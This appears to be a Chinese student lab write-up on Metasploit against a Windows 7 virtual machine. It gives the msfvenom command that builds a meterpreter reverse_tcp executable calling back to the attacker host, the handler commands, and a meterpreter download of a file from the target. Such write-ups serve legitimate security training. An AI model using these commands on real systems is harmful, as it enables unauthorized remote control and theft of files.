复现任务A(2)

复现任务A(2)

二、Metasploit应用

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

复现过程:

一、环境:

1、靶机:Windows7 (IP:192.168.78.130)

2、攻击机:kali (IP:192.168.78.128)

二、渗透过程:

1、生成主控端

在Kali终端执行命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.78.128 lport=5000 -f exe -o /root/payload.exe
  • -p:使用反向远程控制程序”windows/meterpreter/reverse_tcp”
  • lhost:设置kali的IP
  • lport:设置端口(要与下面的set lport保持一致)
  • -f:文件类型为exe类型
  • -o:生成payload,名为payload.exe,报保存在kali的/root目录下

Kali Linux 2中提供了多个可以用来产生远程被控制端程序的方式,但是其中最为简单强大的方法就要数Msfvenom命令了。这个命令是注明渗透测试软件Metasploit的一个功能,但是我们可以直接在Kali Linux 2 中使用这个命令。

以前旧版本的Meatasploit 中提供了两条关于远程控制被控端程序的命令,其中msfpayload负责用来生成攻击载荷,msfencode负责对攻击载荷进行编码。新版本Metasploit中将这两条命令整合成为msfvenom命令。

执行的结果如下图:

打开该文件夹,我们可以找到该程序:

复现任务A(2)_第1张图片

2、生成主控端

在Kali终端执行命令启动Metasploit:

msfconsole

执行结果如下:

复现任务A(2)_第2张图片

hh箭头这里的图案都是会变化的。

然后依次执行一下命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.78.128

set lport 5000

exploit

执行的结果如下:
复现任务A(2)_第3张图片

3、将payload.exe复制到目标机上并运行

这里的exe文件是点不开的,我们只需点击就行

复现任务A(2)_第4张图片

然后Kali终端有了响应,如下图:

复现任务A(2)_第5张图片

我们看到成功获得权限了,现在我们可以对靶机进行操控了

4、对目标机进行操控

执行ls查看当前目录文件:

复现任务A(2)_第6张图片

可以看到我事先在目标机上下载好的test2.txt,接下来执行download test2.txt

复现任务A(2)_第7张图片

可以发现该文件已经下载到/root的文档里了。
复现任务A(2)_第8张图片

你可能感兴趣的:(服务器,网络,linux)